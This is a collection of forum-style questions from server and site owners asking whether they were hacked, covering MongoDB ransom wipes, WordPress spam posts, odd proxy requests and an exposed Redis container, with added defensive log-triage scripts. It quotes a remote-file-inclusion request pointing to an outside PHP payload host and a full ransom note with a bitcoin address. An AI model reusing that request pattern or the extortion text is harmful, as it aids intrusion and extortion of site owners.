Can WhatsApp, Signal or Telegram be hacked through a SIM SWAP attack?

In Cuba the telecoms/ISP monopoly, Etecsa, works with the political police to spy on dissidents, journalists and others. A common attack in Cuba is therefore SIM swapping, which is easy for them. It is also effective for eavesdropping on phone conversations and SMS. My question is: Would the SIM swap enable the attacker to also hack WhatsApp, Signal or Telegram and gain access to these messages or calls? If so, are there any measures that can be taken to prevent the attacker from accessing the secure messaging apps via a SIM swap attack? Thank you very much for your help.

Mongo DB hacked (read_me_to_recover) without the port exposed in the firewall?

I have recently set up parse-server on a DO VPS, using 3 docker containers: one for parse-server, one for the parse-server dashboard and one for mongodb. Because I am just testing this setup I left the mongo container as it is (mongodb://mongo:27017/dev). I have NGINX (not in docker) running as a reverse proxy (to get SSL). It forwards ports 80 and 443 to http://127.0.0.1:4040 internally (the parse dashboard web GUI), and it routes 1338 to http://127.0.0.1:1337, the parse server (API) itself. This parse server connects to my mongo DB internally.

This is the first time I am using Docker and MongoDB. Because of this setup and the mongo DB port not being open, I thought it would be half-decently safe. My question is, how did the hacker breach my database? There was nothing of value stored but there might be in the future. I don’t think he exploited my parse server because I could see the connection coming from a CPython client (the parse connection showed as a nodeJS client).

I have added: NGINX, firewall, Docker processes, Mongo log lines

nginx terminal

{"t":{"$date":"2020-08-13T12:23:14.165+00:00"},"s":"I",  "c":"NETWORK",  "id":22943,   "ctx":"listener","msg":"connection accepted","attr":{"remote":"46.182.106.190:39672","sessionId":31,"connectionCount":3}}
{"t":{"$date":"2020-08-13T12:23:14.359+00:00"},"s":"I",  "c":"NETWORK",  "id":51800,   "ctx":"conn31","msg":"client metadata","attr":{"remote":"46.182.106.190:39672","client":"conn31","doc":{"driver":{"name":"PyMongo","version":"3.10.1"},"os":{"type":"Linux","name":"Linux","architecture":"x86_64","version":"4.15.0-112-generic"},"platform":"CPython 3.6.9.final.0"}}}
{"t":{"$date":"2020-08-13T12:23:15.941+00:00"},"s":"I",  "c":"COMMAND",  "id":20337,   "ctx":"conn31","msg":"dropDatabase - starting","attr":{"db":"READ_ME_TO_RECOVER_YOUR_DATA"}}

> db.README.find();
{ "_id" : ObjectId("5f3536cd2a546e2eea8211eb"), "content" : "All your data is a backed up. You must pay 0.015 BTC to 145Nny3Gi6nWVBz45Gv9SqxFajuwTb2qTw 48 hours for recover it. After 48 hours expiration we will leaked and exposed all your data. In case of refusal to pay, we will contact the General Data Protection Regulation, GDPR and notify them that you store user data in an open form and is not safe. Under the rules of the law, you face a heavy fine or arrest and your base dump will be dropped from our server! You can buy bitcoin here, does not take much time to buy https://localbitcoins.com with this guide https://localbitcoins.com/guides/how-to-buy-bitcoins After paying write to me in the mail with your DB IP: restore_base@tuta.io" }
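
Added example, not part of the original question: a Python triage script for MongoDB structured (JSON) log lines like the ones posted above. It lists every connection accepted from outside a set of internal IPv4 ranges, together with the driver it announced and any dropDatabase commands it issued. The sample lines, the internal ranges and the function names are assumptions made for the example.

```python
import json
from ipaddress import ip_address, ip_network

# Assumption: peers outside these ranges are not local or container-network clients.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample lines (not real data) in the structured format shown above.
SAMPLE_LOG = """\
{"t":{"$date":"2020-08-13T12:20:01.000+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"connection accepted","attr":{"remote":"172.18.0.3:51234","sessionId":30,"connectionCount":2}}
{"t":{"$date":"2020-08-13T12:20:01.100+00:00"},"s":"I","c":"NETWORK","id":51800,"ctx":"conn30","msg":"client metadata","attr":{"remote":"172.18.0.3:51234","client":"conn30","doc":{"driver":{"name":"nodejs","version":"3.6.0"}}}}
{"t":{"$date":"2020-08-13T12:23:14.165+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"connection accepted","attr":{"remote":"203.0.113.7:39672","sessionId":31,"connectionCount":3}}
{"t":{"$date":"2020-08-13T12:23:14.359+00:00"},"s":"I","c":"NETWORK","id":51800,"ctx":"conn31","msg":"client metadata","attr":{"remote":"203.0.113.7:39672","client":"conn31","doc":{"driver":{"name":"PyMongo","version":"3.10.1"}}}}
{"t":{"$date":"2020-08-13T12:23:15.941+00:00"},"s":"I","c":"COMMAND","id":20337,"ctx":"conn31","msg":"dropDatabase - starting","attr":{"db":"dev"}}
"""


def is_external(remote):
    """True when the "ip:port" peer address lies outside INTERNAL_NETS."""
    host = remote.rsplit(":", 1)[0].strip("[]")
    return not any(ip_address(host) in net for net in INTERNAL_NETS)


def triage(log_text):
    """Map connection id -> details for every externally sourced session."""
    sessions = {}
    for line in log_text.splitlines():
        try:
            entry = json.loads(line)
        except ValueError:  # skip non-JSON lines such as shell output
            continue
        msg, ctx, attr = entry.get("msg"), entry.get("ctx"), entry.get("attr", {})
        if msg == "connection accepted" and is_external(attr["remote"]):
            # ctx of later lines is "conn" + sessionId, as in the posted log
            sessions["conn%d" % attr["sessionId"]] = {
                "remote": attr["remote"], "time": entry["t"]["$date"],
                "driver": None, "dropped": []}
        elif ctx in sessions and msg == "client metadata":
            drv = attr["doc"]["driver"]
            sessions[ctx]["driver"] = "%s %s" % (drv["name"], drv["version"])
        elif ctx in sessions and msg == "dropDatabase - starting":
            sessions[ctx]["dropped"].append(attr["db"])
    return sessions


if __name__ == "__main__":
    for conn, info in triage(SAMPLE_LOG).items():
        print(conn, info)
```

Any session this reports means the database port was reachable from outside the host at that time, whatever the firewall rules were expected to allow.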

My site appears to be hacked?

I recently found some random posts have been made from one of our users’ accounts without the user’s consent. We checked vividly with the security plugins but didn’t find anything. While we checked our server logs we found something like /ajax-index.php?url=http://majoydiego.com/wp-includes/css/dist/components/style.css

This URL contains a PHP payload.

Can anyone help me understand what this code is exactly and how the hacker gets access to my user and is able to post? Though I uninstalled all those plugins and tried to secure as much as possible, I am still worried!!!

Have I been hacked (netstat output too many dgrams and stream connections) [closed]

netstat output

These are the output images of the netstat command I ran. It shows that there are too many outbound connections and many dgrams and streams. I also tried to capture the output using Wireshark and then reverse checking who the IP addresses belong to (using www.arin.net); it showed up various organisations (Google, Astricia).

I also tried to turn off the wifi and then ran netstat, but there was no change in the dgram and stream connections.

Please help, any input will be appreciated.

Unusual GET requests in my nodejs journal – has my nginx/node been hacked?

Saw this in the journalctl for a service I have:

jul 29 12:39:05 ubuntu-18 node[796]: GET http://www.123cha.com/ 200 147.463 ms - 8485
jul 29 12:39:10 ubuntu-18 node[796]: GET http://www.rfa.org/english/ - - ms - -
jul 29 12:39:10 ubuntu-18 node[796]: GET http://www.minghui.org/ - - ms - -
jul 29 12:39:11 ubuntu-18 node[796]: GET http://www.wujieliulan.com/ - - ms - -
jul 29 12:39:11 ubuntu-18 node[796]: GET http://www.epochtimes.com/ 200 133.357 ms - 8485
jul 29 12:39:14 ubuntu-18 node[796]: GET http://boxun.com/ - - ms - -

These GET requests are not coming from any code I’ve written.

"Correct" entries look like this:

jul 29 12:41:46 ubuntu-18 node[796]: GET / 304 128.329 ms - -
jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/bootstrap.min.css 304 0.660 ms - -
jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/font-awesome-4.7.0/css/font-awesome.min.css 304 0.508 ms - -
jul 29 12:41:47 ubuntu-18 node[796]: GET /img/250x250/deciduous_tree_5.thumb.png 304 0.548 ms - -
jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/style.css 304 7.087 ms - -
jul 29 12:41:47 ubuntu-18 node[796]: GET /img/logos/250x250/brf_masthugget.250x250.jpg 200 0.876 ms - 9945

The server is a nodejs instance v8.10.0, running on nginx v1.14.0, running on up to date Ubuntu server 18.04.

The ubuntu is a Digital Ocean droplet.

I’ve tried generating similar requests from a javascript console, but my browser blocks access to http (not allowing mixed http and https); if I try https I get a cross-origin error – which is good 🙂

I’m puzzled as to how these GET requests are being generated/sent?
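
Added example, not part of the original question: a Python filter for journal lines in the format shown above that separates requests whose target is an absolute URL (the request form a client sends to a forward proxy) from ordinary path requests, and records the status the app logged for each. The sample lines use constructed `.example` hosts, and the function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Matches the "node[pid]: METHOD target status ..." part of each journal line.
LINE_RE = re.compile(
    r"node\[\d+\]: (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3}|-) ")

# Constructed sample (not real data) in the journal format shown above.
SAMPLE_JOURNAL = """\
jul 29 12:39:05 ubuntu-18 node[796]: GET http://probe-one.example/ 200 147.463 ms - 8485
jul 29 12:39:10 ubuntu-18 node[796]: GET http://probe-two.example/english/ - - ms - -
jul 29 12:41:46 ubuntu-18 node[796]: GET / 304 128.329 ms - -
jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/style.css 304 7.087 ms - -
jul 29 12:41:48 ubuntu-18 node[796]: GET /go?to=http://other.example/ 200 1.000 ms - 12
"""


def absolute_form_requests(journal_text):
    """Return one record per request whose target is a full http(s) URL."""
    hits = []
    for line in journal_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # A URL inside a query string has no scheme at the start, so it is skipped.
        if parts.scheme in ("http", "https") and parts.netloc:
            hits.append({"host": parts.hostname,
                         "status": m["status"],
                         "answered": m["status"] != "-"})
    return hits


def status_summary(hits):
    """Count absolute-form requests by the status the app logged for them."""
    return Counter(hit["status"] for hit in hits)


if __name__ == "__main__":
    for hit in absolute_form_requests(SAMPLE_JOURNAL):
        print(hit)
    print(dict(status_summary(absolute_form_requests(SAMPLE_JOURNAL))))
```

Records with `answered` set show that the app returned a response for a foreign host name, which is worth comparing against the size of its own front page.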

Redis docker container has been hacked, next steps?

I accidentally left the port of my redis container open and noticed that it crashed all the time today.

Now the mounted volume is full of files like red2.so, admin, root, www, apache, backup.db.

I closed the port, deleted the files and rebuilt the docker container. Is there a risk of my server outside of the container being infected?

There are no new or altered entries in crontab or the .ssh/authorized_keys file, but I’m not sure what I should check additionally.

My WordPress Website is Hacked, Showing unknown post which has not been posted by me [closed]

My WordPress website is hacked. This is my website blog link: https://bugyalvalley.com/blog/

It is showing an unknown post which has not been posted by me. The name of the spam post is "Site De Rencontre Gratuit En Algerie". I don’t know what this is.

In the dashboard category the post is hidden. I am not able to see it.

Please help me to remove the post.

screenshot of that post